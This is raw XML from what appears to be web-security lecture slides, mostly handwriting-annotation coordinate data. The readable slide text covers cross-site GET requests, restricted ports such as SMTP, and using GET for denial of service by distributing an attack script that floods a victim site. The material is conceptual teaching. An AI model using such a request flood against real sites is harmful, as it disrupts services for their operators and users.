            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>file.cgi?foo</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>=1&amp;bar=x y"&gt;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kern="1200" dirty="0"/>
            <a:t>Browser sends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None/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>GET </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>file.cgi?foo</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>=1&amp;bar=x%20y HTTP/1.1 to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>othersite.com</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="898507"/>
        <a:ext cx="6479180" cy="997222"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{66D2A76D-EB1D-394A-A811-28182070C079}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1895730"/>
          <a:ext cx="6479180" cy="879840"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="560596"/>
            <a:satOff val="-25182"/>
            <a:lumOff val="333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Can’t send to some restricted ports</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="42950" y="1938680"/>
        <a:ext cx="6393280" cy="793940"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{36FA513D-BD1F-0C40-827F-3853CC19B153}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2775570"/>
          <a:ext cx="6479180" cy="778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5714" tIns="22860" rIns="128016" bIns="2286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kern="1200"/>
            <a:t>For example, port 25 (SMTP)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2775570"/>
        <a:ext cx="6479180" cy="778320"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7CAA10BC-1FA5-DA43-9FCE-9221EF31230E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3553890"/>
          <a:ext cx="6479180" cy="879840"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="1121191"/>
            <a:satOff val="-50365"/>
            <a:lumOff val="666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Can use GET for denial of service (DoS) attacks</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="42950" y="3596840"/>
        <a:ext cx="6393280" cy="793940"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D5C56F91-811E-A540-AE78-36A22AEF62AA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4433730"/>
          <a:ext cx="6479180" cy="778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5714" tIns="22860" rIns="128016" bIns="2286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kern="1200" dirty="0"/>
            <a:t>Distribute attack script to issue many GETs to victim site</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="4433730"/>
        <a:ext cx="6479180" cy="7783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9T20:28:10.14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3339 22 13210,'-26'-5'0,"-5"4"2049,-25-4 1,-4 1-2050,-1 3 0,-6-2 0,0 1 0,8 2 2078,14 0-2078,-22 8 1159,21 2-1159,-28 9 0,0-1 0,14 0 0,-2 0 0,12-6 0,-1 1 0,-20 10 0,1 1 2481,-23-2-2481,4 16 0,0-16 0,43-3 0,-1 0 0,-7-7 0,0 0-211,-39 17 211,41-14 0,0 1 0,-26 13 0,-11 3 0,16-6 0,-1 1 0,0 2 0,15 3 0,-11 4 0,19 4 0,-5-6 0,17 3 0,2-11 0,-1 10 0,-4-6 1196,-12 22-1196,21-25 0,-18 25 563,31-32-563,-18 23 0,21-25 0,-6 11 0,6-8 0,7-5 0,-4-1 0,12-5 0,-12 0 0,8 1 0,-5 8 0,6-6 0,-5 6 0,5-13 0,-6 8 0,5-8 0,2 9 0,-1-4 0,4-1 0,-8 0 0,3 0 0,-5 1 0,1-1 0,4 0 0,-3-4 0,8 3 0,-13-3 0,2 4 0,-9 0 0,0 1 0,0-1 0,-8 1 0,6 5 0,-6 1 0,0 6 0,10-6 0,-9 0 0,17-11 0,-5 3 0,6-3 0,4 4 0,-3 0 0,3 1 0,0-1 0,-3 0 0,3-4 0,0 3 0,2-3 0,-1 4 0,-1-4 0,0 8 0,-3-8 0,-1 14 0,3-9 0,2-5 0,11-29 0,5-7 0,-5-18 0,0-7 0,-6-13 0,0-9 0,0-21-609,0 20 609,0 26 0,0 0 0,0-26-74,0 5 74,8 2 0,-1 27 0,2-3 0,0 22 0,-8 14 0,4 7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9T20:40:33.97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24575,'11'0'0,"-1"0"0,0 0 0,0 4 0,1-3 0,4 8 0,1-3 0,4 0 0,1 3 0,-5-8 0,12 4 0,-10-5 0,11 0 0,-13 0 0,-1 0 0,-4 0 0,-1 4 0,0-3 0,0 4 0,1-5 0,4 5 0,1 0 0,0 1 0,-1 3 0,-5-8 0,0 8 0,1-8 0,-1 4 0,-4-5 0,-2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9T20:42:57.51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723 0 24575,'0'16'0,"0"-1"0,-5-5 0,4 0 0,-9 5 0,5-3 0,-1 7 0,-3-7 0,-2 7 0,4-3 0,-7 5 0,8 0 0,1-5 0,-5 4 0,0-4 0,-2 4 0,-12 10 0,6-7 0,-22 23 0,15-22 0,-12 12 0,17-15 0,3-5 0,-2 4 0,7-4 0,-8 0 0,9 3 0,-9-7 0,8 7 0,-3-7 0,5 7 0,-1-3 0,1 1 0,-1-3 0,1 1 0,-1-3 0,1 3 0,0 0 0,-6 1 0,5 5 0,-9-1 0,1 9 0,2-6 0,0 6 0,2-13 0,3-1 0,2-5 0,0 1 0,5-1 0,-1 0 0,-4 1 0,5-1 0,-6 0 0,5 0 0,-3-4 0,8 3 0,-8-3 0,7 4 0,-2 1 0,-1-6 0,4 4 0,-4-17 0,5 1 0,0-14 0,0-8 0,0-2 0,-6-18 0,5 15 0,-5 0 0,6 14 0,0 9 0,0-4 0,0 4 0,0-4 0,0-1 0,0 0 0,0 0 0,0 6 0,0 0 0,0-1 0,0 1 0,0 4 0,0 1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9T20:42:58.69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43 24575,'6'-5'0,"3"4"0,-3-4 0,9 5 0,1-5 0,5 4 0,-1-8 0,10 8 0,-8-8 0,12 7 0,-17-2 0,7 4 0,-12 0 0,3 0 0,-5 4 0,0-3 0,5 4 0,1-5 0,5 0 0,0 0 0,-1 0 0,1 0 0,-5 0 0,4 0 0,-9 0 0,9 0 0,-4 0 0,5 0 0,-5 0 0,-1 0 0,-10 0 0,0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0T16:23:49.131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0 24575,'32'22'0,"1"0"0,-1 8 0,3-4 0,16 29 0,10 1 0,-7-3-1639,-2-2 1,-1 2-1639,1 8 2184,4 6 1,11 17 0,-10-13 756,-25-30 1,-1-1 137,13 21 1,7 7 0,-9-11 197,0-4 0,14 15-343,0-4 343,-23-26 3276,18 22-2072,-32-25 2072,14 9-1514,-19-17-591,-9-12-1171,5 13 748,-4-7-748,0 14 0,4 2 0,-9-10 0,9 4 0,-9-22 0,8-3 0,-8 2 0,7-3 0,-2 5 0,-1 4 0,3-3 0,-7 7 0,8 5 0,-8-5 0,8 4 0,-4-17 0,4-5 0,-3-1 0,-2-3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0T16:23:50.586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67 0 24575,'-4'20'0,"2"-1"0,-2-6 0,4 10 0,-4 15 0,-5 15 0,3 10 0,-10 6 0,9-14 0,-2-4 0,3-22 0,6-2 0,4-16 0,3-19 0,-1 4 0,-1-13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0T16:23:51.933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40 24575,'15'-10'0,"-1"5"0,-5 0 0,1 5 0,0 0 0,16 0 0,-8 0 0,13 0 0,-12 0 0,8 0 0,3 0 0,23 0 0,-12 0 0,0 0 0,-19 0 0,-8 0 0,-4 0 0,4 0 0,-4 0 0,-1-4 0,1 3 0,-1-3 0,10 4 0,-8 0 0,8 0 0,-10 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1-5 0,0 4 0,-1-3 0,1 4 0,-1 0 0,5 4 0,-3-3 0,3 4 0,-4-5 0,-1 0 0,-4 4 0,4-3 0,-4 3 0,5-4 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 4 0,-1-3 0,-3 4 0,-2-5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0T16:24:50.390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1490 24575,'15'-37'0,"-1"1"0,-4 21 0,4-5 0,-4 1 0,27-37 0,-22 28 0,15-31 0,-1-3 0,-11 19 0,4-10 0,4-2 0,10-5 0,-6-11 0,9 11 0,-23 9 0,2 14 0,-3 8 0,7-24 0,-10 28 0,11-24 0,-21 32 0,15-18 0,-11 21 0,8-18 0,-4 21 0,4-11 0,-4 10 0,4-7 0,-9 9 0,25-25 0,-19 14 0,24-16 0,-28 23 0,10 0 0,-15 3 0,11-3 0,-12 4 0,20-12 0,-12 9 0,9-15 0,-10 22 0,-2-11 0,-1 10 0,4-3 0,-8 2 0,3 2 0,-4-4 0,4-4 0,-3 4 0,8-9 0,-8 8 0,3-3 0,0 9 0,-3-4 0,4 4 0,-5-5 0,4 0 0,-3 0 0,-18 15 0,4 1 0,-55 24 0,39-8 0,-13 0 0,-8 3-1639,2 3 1,-1 0-1,2-5 1,-1-1 1523,-5 5 0,4-5 115,-2-13 0,14 2 0,12-10 0,3 5 0,17-6 0,0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0T16:24:51.582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1 24575,'5'15'0,"4"-2"0,-4-3 0,13 8 0,-6-2 0,6 4 0,-4-2 0,1-3 0,23 31 0,22 28 0,-18-16 0,8 8 0,-40-46 0,8 16 0,-2-12 0,3 12 0,-9-21 0,7 12 0,-14-14 0,14 5 0,-11-9 0,3-4 0,-4 5 0,4-5 0,-8 4 0,3-4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0T15:25:45.584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1 167 24575,'52'-17'0,"2"-2"0,6 8 0,-9 6 0,4 1 0,2 4 0,3 0-492,29 0 0,9 0 164,-21 1 0,4 0 0,-1-3 0,-4-2 0,0-3 0,-2 2 0,-2 4 0,-1 1 0,2-3 0,18-7 0,3-4 0,-6 4-164,6 8 0,-1-1 164,-8-7 0,6-3 0,-6 3-164,11 8 0,-6 1 0,-6-7 0,-4 1 0,-20 6 0,-3 2 0,-1-1 0,-6 0 1475,-3 0 0,-3 0-738,-13 7 1,-13-5 0,-4 5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0T15:25:46.900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1 615 24575,'31'-25'0,"-7"-5"0,6 6 0,7-12 0,10 0 0,0 3 0,3-3 0,-10 3 0,0-1 0,9-2 0,1-1 0,-7-4 0,-5 3 0,5-3 0,3-7 0,-31 25 0,1 7 0,-7 0 0,4 7 0,-11-5 0,5 13 0,-7-6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9T20:28:11.29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17985,'10'6'0,"25"-1"2976,15 3-2976,1-2 0,2 0 0,13 5 0,3 5 0,8 1 45,-5-9 0,2 2-45,-9 4 0,2 5 0,1-4-1372,31 0 0,-2-1 1372,-9 4 0,-4 0 0,-18-5 0,-5-3 852,32 3-852,-23-4 0,-44-9 0,-2 0 171,-19 5 1,0-4 0,-5 4-1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0T15:25:48.366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 0 24575,'26'16'0,"1"-8"0,-11 6 0,1-5 0,13 6 0,-13 1 0,6-1 0,-8-6 0,8 5 0,-6 1 0,6 3 0,-8 11 0,8-4 0,1 6 0,1-7 0,4 6 0,-11-13 0,4 6 0,-6-14 0,-1 4 0,1-4 0,-8 7 0,6-8 0,-12 6 0,12-12 0,-6 12 0,1 1 0,5 3 0,2 11 0,1-4 0,13-1 0,-13 6 0,5-13 0,-6 5 0,0-13 0,-8-9 0,-1 12 0,0-9 0,-5 20 0,5-8 0,0-6 0,-6 5 0,13-5 0,-5 6 0,6 8 0,1 1 0,-1 0 0,1-1 0,-7-8 0,4-6 0,-4-2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4T01:14:14.596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1922 1 24575,'-27'13'0,"-11"2"0,-3 8 0,-10 4 0,-21 13 0,-4 2-1473,29-18 1,-3 0 1472,-7 3 0,-2-2 0,9-7 0,-1 2 49,-11 13 0,1-1-49,-17 3 0,25 6 0,-5 7 0,3-7 0,-3 2 0,4-3 0,4 3 0,1-2 0,-35 21 0,12-8 0,42-26 0,-8 2 0,10-3 0,-10 3 0,2 4 0,-14 1 0,11-1 0,-1 1 0,-20 7 0,17-12 0,2-1 2177,1 0-2177,7-18 670,8 1-670,16-6 0,-9-5 0,22 5 0,3-24 0,2-9 0,3-9 0,-12-13 0,0 13 0,0-4 0,0 7 0,0-5 0,0-3 0,0-11 0,-6-18 0,5 31 0,-5-16 0,6 40 0,0-5 0,0 1 0,0 4 0,0-5 0,0 6 0,5 1 0,-3-1 0,10 7 0,-11 1 0,5 6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4T01:14:16.454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15 24575,'21'-8'0,"-2"2"0,12 6 0,3 0 0,18 0 0,10 0 0,9 0 0,-4 5 0,1 1-281,8-1 0,-3 0 281,24 8 139,-50-6-139,-35-1 0,17-4 0,-22 4 0,7 0 0,-1 1 423,0 0-423,1-1 0,-1 0 0,0-4 0,-5 10 0,-2-11 0,-6 5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9T20:55:28.305"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.35" units="cm"/>
      <inkml:brushProperty name="height" value="0.35" units="cm"/>
      <inkml:brushProperty name="color" value="#941100"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 42 24575,'28'0'0,"0"0"0,-16 0 0,7 0 0,-7 0 0,8 0 0,-4 0 0,4 0 0,1 0 0,0 0 0,8 0 0,-6 0 0,6 0 0,0 0 0,-6-5 0,6 4 0,-9-4 0,-3 1 0,2 3 0,-7-4 0,7 5 0,-7 0 0,7 0 0,-7-5 0,7 4 0,-3-8 0,0 8 0,4-4 0,-9 5 0,17 0 0,-14 0 0,14 0 0,-12 0 0,13 0 0,-6 0 0,14 0 0,-14 0 0,14 0 0,-19 0 0,10 0 0,-3 0 0,-7 0 0,10 0 0,-12 5 0,5-4 0,-1 3 0,1-4 0,0 0 0,0 0 0,9 0 0,-7 0 0,7 0 0,-14 0 0,12 0 0,-10 0 0,19 0 0,-14 5 0,1-4 0,4 4 0,-1-5 0,12 5 0,1-3 0,-9 4 0,6 0 0,-5-5 0,-1 9 0,6-8 0,-19 2 0,10-4 0,-3 6 0,-3-5 0,16 11 0,-15-10 0,6 8 0,0-3 0,2-1 0,9 0 0,14-6 0,22 0 0,2 0 0,-1 6 0,-23-5 0,-14 5 0,-9-6 0,6 0 0,-6 0 0,1-5 0,-3 4 0,0-4 0,-6 5 0,23 0 0,-21 0 0,37 0 0,-27 0 0,20 0 0,-16 0 0,16 0 0,-12 0 0,27 0 0,-35 0 0,18 0 0,-30 0 0,14 0 0,-19 0 0,10 0 0,-3 0 0,-3-4 0,8 3 0,-5-4 0,-3 5 0,11-6 0,-14 5 0,17-5 0,-18 6 0,19 0 0,-14-5 0,15 4 0,-7-4 0,0 5 0,6 0 0,-5 0 0,7 0 0,1 0 0,0 0 0,1 0 0,-2 0 0,1 0 0,-9 0 0,6 0 0,-6 0 0,9-6 0,-9 5 0,6-5 0,-5 6 0,7 0 0,-8 0 0,-2 0 0,-8-5 0,0 4 0,-5-4 0,3 5 0,6 0 0,6 0 0,9 0 0,-1 0 0,1 0 0,-9 0 0,6 0 0,-6-5 0,9-3 0,-1 1 0,16 1 0,-12 6 0,12 0 0,-15 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-9 0 0,-2 0 0,-13 0 0,3 0 0,-2 0 0,3 0 0,1 4 0,8-2 0,2 8 0,9-9 0,-1 5 0,18 0 0,-13-4 0,13 3 0,-26-5 0,-1-4 0,-10 3 0,1-4 0,0 0 0,-5 4 0,3-4 0,-3 5 0,5 0 0,5-4 0,-9 3 0,2-4 0,-4 5 0,-3-5 0,3 4 0,-1-3 0,-2 4 0,3 4 0,0-3 0,1 8 0,5-7 0,-5 2 0,-1-4 0,-1 0 0,-2 0 0,3 0 0,-5 0 0,0 0 0,0 0 0,1 5 0,-1-4 0,5 3 0,-4-4 0,9 0 0,-4 0 0,0 5 0,-1-4 0,-5 4 0,1-5 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,5 0 0,1 0 0,0 0 0,-1 0 0,-5 0 0,5 0 0,-3 0 0,-2 4 0,-5 2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9T20:58:22.225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372 97 24575,'-16'11'0,"1"-6"0,5 4 0,-1 2 0,-4 0 0,4 9 0,0-9 0,2 9 0,-12 32 0,5-14 0,-17 29 0,20-36 0,-18 29 0,10-23 0,-8 39 0,11-41 0,0 13 0,1-1 0,2-14 0,-11 38 0,17-50 0,8 0 0,-4 13 0,5-10 0,0 11 0,0-6 0,0 11 0,0 2 0,6 16 0,1-16 0,6 57 0,0-47 0,-5 38 0,-3-64 0,5 16 0,-8-22 0,12 14 0,-9-18 0,10 31 0,-8-28 0,8 36 0,-14-36 0,14 28 0,-8-26 0,3 12 0,0-23 0,4 19 0,-6-14 0,15 18 0,-16-17 0,8 5 0,-5-5 0,1-1 0,-6-5 0,4 0 0,-3 1 0,4 4 0,19 19 0,-9-8 0,14 13 0,-18-23 0,22 22 0,-17-22 0,18 22 0,-10-20 0,8 18 0,-5-10 0,3 4 0,-19-15 0,17 9 0,-13-10 0,10 10 0,-11-14 0,11 9 0,2-5 0,5 6 0,-13-9 0,19 9 0,-13-6 0,40 9 0,-12-7 0,-3-3 0,1 1 0,12 4 0,-13-8 0,-3-2 0,-9-3 0,12 1 0,-24-4 0,7 9 0,-20-9 0,18 10 0,-9-11 0,24 9 0,5 0 0,1-7 0,37 11 0,-66-14 0,-3 5 0,-2 1 0,2-1 0,-5 4 0,14-3 0,-8 4 0,30 7 0,-22-4 0,37 9 0,-26-14 0,16 8 0,-21-8 0,41 9 0,-15 0 0,-1-3 0,3 1 0,14 5 0,-11-7 0,-1-1 0,13-3 0,11 3 0,-40-11 0,30 10 0,-33-4 0,24-1 0,-37 0 0,58 2 0,-25-6 0,-8 2 0,-2 0 0,-2-4 0,-6 3 0,-1 0 0,-8-2 0,43 5 0,-25-6 0,29 0 0,-10 0 0,3 0 0,-14 0 0,-8 0 0,4 0 0,-14 0 0,1 0 0,19 0 0,-5 0 0,-8 0 0,0 0 0,2 0 0,10 0 0,-7 0 0,-1 0 0,-4 0 0,9 3 0,2 2 0,4 5 0,-2-1 0,-4 1 0,-18 0 0,22 3 0,4 1 0,10 0-500,-15-1 1,1 1 499,-23-4 0,2 1 0,15-2 0,7 1 0,-6-1 0,-13-2 0,2 0 0,23 4 0,11 1 0,-15-4 0,6-6 0,12 12 0,3 1 0,-42-13 0,1 0 0,31 7 0,-3 0 0,-5-9 0,1 1 0,17 2 0,-8 1 0,-14 2 0,0 0-682,16-2 1,9-1 0,-17 1 681,2 7-1639,13-10 1,0-2-861,-19 1 2499,-9 0 0,11 0 0,-14 0 0,-8 0 0,28 0 0,7 0 0,-43-1 0,0 2-133,37 3 0,3 1 133,-18-4 0,-5 1 0,29 15 0,-38-10 0,3-2 0,9 0 0,1 1 0,-5-1 0,3-1 0,19-3 0,-1-2 0,-24 1 0,0 0 0,24 5 0,0 0 0,-27-5 0,0 2 0,35 8 0,-1 1 0,-37-9 0,2-2 0,16 4 0,9 1 0,-7-2 0,-10-3 0,-1 0 0,8 0 1,6 0 0,-13 0-1,6 0 0,25 0 3276,-32 0-1192,11 0-2084,12-9 0,-31 7 0,12-6 1270,-11 0-1270,32 6 0,5-15 0,-33 16 0,0 0 2109,20-7-2109,-16 7 0,11 1 0,-11 1 0,19-1 0,9 0 0,-5 0 344,-32 0-344,24-12 0,-36 9 0,12-13 0,-21 14 0,30-8 0,-19 3 0,44-1 0,-48-4 0,40 11 0,-38-11 0,20 11 0,-26-5 0,59 1 0,-29 4-278,-12-5 0,2-1 278,13-3 0,-19 1 0,1-1 0,28-9 0,-29 14 0,0 0 0,35-13 0,-36 12 0,-1 2 0,28-8 0,-23 0 0,0 1 0,21 8 0,-19-6 0,-1-1 0,22 3 0,-3 1 0,-38-6 0,1 5 0,14-9 0,-10 8 0,26-9 0,-12 7 0,1-6 556,-13 6-556,22-5 0,3 6 0,7-8 0,-5 4 0,-34 0 0,36-12 0,-35 10 0,32-16 0,-49 19 0,50-25 0,-42 22 0,51-25 0,-49 20 0,26-17 0,-30 11 0,25-19 0,-34 25 0,37-38 0,-36 41 0,15-25 0,-21 26 0,11-32 0,-3 20 0,11-28 0,-17 33 0,0-2 0,-2 6 0,1 2 0,8-12 0,-12 11 0,9-15 0,-15 20 0,14-16 0,-9 12 0,9-18 0,-9 16 0,-1-5 0,-1 14 0,6-29 0,-7 22 0,11-21 0,-18 27 0,8-9 0,-8 3 0,8-9 0,-8 5 0,8-26 0,-3 19 0,6-38 0,-6 46 0,10-44 0,-14 32 0,15-26 0,-16 27 0,5-26 0,-6 34 0,0-23 0,0 21 0,0-42 0,-5 26 0,4-24 0,-3 44 0,-2-35 0,4 30 0,-8-29 0,8 31 0,-16-18 0,10 8 0,-7 0 0,5 23 0,0-12 0,-2 9 0,-3-12 0,5 11 0,-10-4 0,3 1 0,-4-3 0,1 6 0,4 0 0,-1 3 0,-2-3 0,7 5 0,-16-2 0,0-3 0,-3 2 0,-8-9 0,8 2 0,-32-14 0,26 12 0,-11 1 0,28 12 0,-5-2 0,6 0 0,-18-6 0,10 5 0,-40-11 0,21 7 0,-21-2 0,28 6 0,-28 0 0,21 3 0,-39-7 0,41 8 0,0 1 0,7 1 0,11 6 0,-29-8 0,11 6 0,-11-12 0,1 12 0,-5-12 0,-1 8 0,-2 0 0,-9-4 0,11 4 0,2 2 0,15 4 0,-47 0 0,41 0 0,-26 0 0,35 0 0,-16 0 0,-2 0 0,-1 0 0,0 1 0,4-2 0,23-4 0,-26 0 0,-2 0 0,17-2 0,-22 1 0,-4 2 0,-12 4 0,-4 0 0,-7 0 0,20 0 0,0 0-555,-8-3 1,2 0 554,21 3 0,-2-1 0,-10-7 0,-7-3 0,4 3 0,1 5 0,0 0 0,-4-3 0,-5-2 0,11 1 0,-21-2 0,13 7 0,-4 1 0,20-4 0,-3 1 0,-16 2 0,-10 3 0,8 0 0,12-1 0,-3 0 0,-6-1 0,-14 1 0,-1-1 0,12 3 0,0 2 0,2 1-1093,-15-4 1,-11-1 0,11 1 1062,14 4 0,1 0 30,-12-4 0,-10-1 0,3-1 0,15 1 0,2 0 0,-3 0 0,-15 0 0,-3 0 0,10 0 0,12 0 0,1 0 0,-16-3 0,-8-1 0,12 0 0,26 3 0,0 0 0,-9-2 0,-14 0 0,0 0 0,14 1 0,5 2 0,1 0 0,-7 0 0,-12 0 0,-1 0 0,10 0 0,-10 0 0,0 0 0,8 0 0,-11 0 0,1 0 0,10 0 0,-5 0 0,-1 0 0,2 2 0,-12 2 0,0-1 0,11-1 0,-4 0 0,-1-1 0,-1 2 0,-13 0 0,0 0 0,17-1 0,13-1 0,0-2 0,-11 1 0,-14 0 0,-2 0 0,12 0 0,-8 0 0,3 0 0,19 0 0,-7 0 0,0 0 0,6 0 0,-20 0 0,-2 0 0,23 3 0,-8 0 0,0 0 0,6 0 0,1-2 0,5-1 0,-3 1 0,-16 3 0,-3 0 0,6 0 0,-8-4 0,8 0-624,20-1 0,1 2 624,-12 3 0,0 1 0,8-4 0,4 1-698,-30 7 698,37-8 0,1-2 0,-19 1 807,4 0-807,4 0 0,-6 0 0,-2 0 0,-14 0 3100,33 0-3100,0 0 0,-2 0 0,-11 0 0,1 0 0,0 0 0,8 0 0,2-4 0,-1 0 0,-5 2 0,12-3 0,1 1 0,-5 4 0,-1-3 0,-1-2 0,-10-5 0,8 5 0,2-1 0,2-8 0,-2 10 0,-1 1 0,-10-4 0,15 3 0,3 2 0,-1 2 1519,0-9-1519,-22 7 0,-1-6 0,16 7 0,2 2 0,7-1 483,-15 0 0,4 0-483,33 0 0,-44 0 0,59 0 0,1 0 0,4 0 0,-4 0 0,4 0 0,-4 0 0,4 0 0,-18 0 0,11 0 0,-29 0 0,14 0 0,-8 0 0,16 0 0,1 0 0,11 0 0,-7 0 0,10-5 0,-1 4 0,1-3 0,-5 4 0,3 0 0,-3 0 0,5 0 0,-1 0 0,1 0 0,-1 0 0,-4 0 0,-28-5 0,15 4 0,-19-4 0,26 5 0,4 0 0,2 0 0,5 0 0,-1 0 0,6-5 0,-5-5 0,9 3 0,-3-2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9T21:03:17.72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4127 851 24575,'-9'10'0,"-11"-4"0,-12-1 0,-55-5 0,20 0 0,14-4 0,-1-1-919,-35-6 919,36 1 0,-2-2 0,2 2 0,-6-1 0,-10-4 0,-8-1 0,6 1 0,7 1 0,-3 0 0,-4-1 0,-11-3 0,-1 0 0,8 1 0,-17-4 0,3 0-1856,14 5 0,-4 0 0,4 0 1856,-16-3 0,-2 1 0,5 3 0,-6-1 0,3 2 0,11 3 0,2 2 0,-4-2-514,5 0 0,-4-2 0,1 1 0,7 1 514,-19-1 0,7 0-547,7 0 1,3 0 546,4 1 0,-1-2 0,8-4 0,-3-3 0,4 2 0,-1 5 0,4-1 0,-12-14 0,10 2 379,22 11-379,1-10 4648,12 16-4648,-15-17 2733,27 18-2733,-14-7 1876,23 6-1876,-3 7 0,8-7 0,-9 3 0,4-4 0,1-1 0,-5 1 0,5 4 0,-1-3 0,1 3 0,5-4 0,0-1 0,0 1 0,0 8 0,-5 13 0,-5 6 0,-2 8 0,-10 4 0,5-11 0,-6 10 0,2-12 0,-8 8 0,10-8 0,-4 2 0,12-8 0,6 0 0,0 1 0,5-1 0,-5 0 0,4 1 0,-4-1 0,5 0 0,-4 0 0,3 1 0,-4-1 0,0 0 0,0 0 0,3-4 0,-1-6 0,12-10 0,-3-2 0,-1-3 0,5 4 0,-9 1 0,3 0 0,-4-1 0,0 1 0,0-1 0,0-4 0,0-10 0,0 12 0,0-5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9T21:03:19.12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22 24575,'5'-11'0,"0"5"0,10 2 0,10 4 0,-2 0 0,14 0 0,-6 6 0,41 3 0,-24-1 0,2-3 0,3-2 0,24-3 0,1 0 0,-26 0 0,-4 0 0,-9 0 0,20 0 0,-33 0 0,-14-4 0,2 2 0,-14-2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9T21:14:41.0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1609 12 16902,'-28'-5'0,"9"4"3388,-15-4-3388,-11 5 0,19 0 1318,-27 0-1318,-9 0 699,23 0-699,-44 0 0,-15 0 0,12 0 0,30 0 0,5 0 0,9 5 2268,6-4-2268,17 8 0,-10-3 0,8 4 0,-8 1 0,6 0 0,-15 2 0,20-7 0,-10 4 0,3 3 0,-6 0 0,0 5 0,-7 1 0,15-7 0,-6 5 0,0 1 0,6-6 0,-7 10 0,9-11 0,5 4 0,1-4 0,5-1 0,-6 0 0,5 1 0,-9-1 0,8 0 0,-3 0 0,5 1 0,-1-1 0,1 0 0,4 0 0,2 1 0,-1-1 0,4 0 0,-9-4 0,5 3 0,-6-8 0,1 8 0,-1-3 0,1 4 0,-1-4 0,6 3 0,-5-8 0,4 9 0,1-5 0,0 5 0,0-4 0,4 3 0,-8-3 0,3 0 0,-4 3 0,-5-3 0,3 4 0,-3-4 0,9 3 0,-3-4 0,8 6 0,-9-6 0,9 5 0,-4-14 0,5 3 0,0-10 0,0 1 0,0-5 0,0-6 0,0-1 0,0 1 0,0 1 0,0-1 0,0 4 0,0-3 0,0 10 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,5-1 0,-4 1 0,4 0 0,-5-1 0,0 1 0,0-1 0,0 1 0,0 4 0,0 1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9T21:14:42.4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21 24575,'0'-10'0,"4"4"0,15 1 0,32 5 0,10 9 0,-4-9 0,1 2 0,9 12 0,7-13 0,-50 5 0,-14-6 0,0 0 0,-4-5 0,-1 4 0,-5-3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9T21:14:45.9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0T15:22:41.76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905 1376 24575,'0'-15'0,"0"1"0,-8-5 0,1 3 0,-7-3 0,4 5 0,-6-8 0,4 5 0,-8-11 0,4 9 0,-6-9 0,7 7 0,-20-21 0,9-3 0,-9 6 0,6-10 0,9 27 0,-4-13 0,7 6 0,-19-15 0,16 13 0,-10-10 0,11 19 0,-4-17 0,6 16 0,-5-16 0,12 17 0,-1-1 0,6 9 0,-4 5 0,8-1 0,-3 0 0,4 0 0,0 1 0,-5-1 0,4 0 0,-3 0 0,4 1 0,0-5 0,0 3 0,0-8 0,0 8 0,0-3 0,0 5 0,0-1 0,0 0 0,0 0 0,0 1 0,0-6 0,0 5 0,0-5 0,-4 1 0,-2-1 0,1 0 0,0-3 0,5 7 0,-4-3 0,3 4 0,-3 0 0,4 0 0,0 1 0,-5 3 0,4-2 0,-7 6 0,7-6 0,-4 2 0,5-8 0,-4 3 0,3-7 0,-4 7 0,5-7 0,0 7 0,0-3 0,0 4 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,-4 4 0,-1 2 0,-5 13 0,0-3 0,0 12 0,-4-3 0,-5 9 0,3-8 0,-3 2 0,9-8 0,1-5 0,-5 4 0,3-4 0,-8 5 0,8-1 0,-7 1 0,7-5 0,-3 4 0,9-4 0,-4 0 0,4-1 0,-5 1 0,0 0 0,0 5 0,0-1 0,1-3 0,3 2 0,2-11 0,8-3 0,-3 0 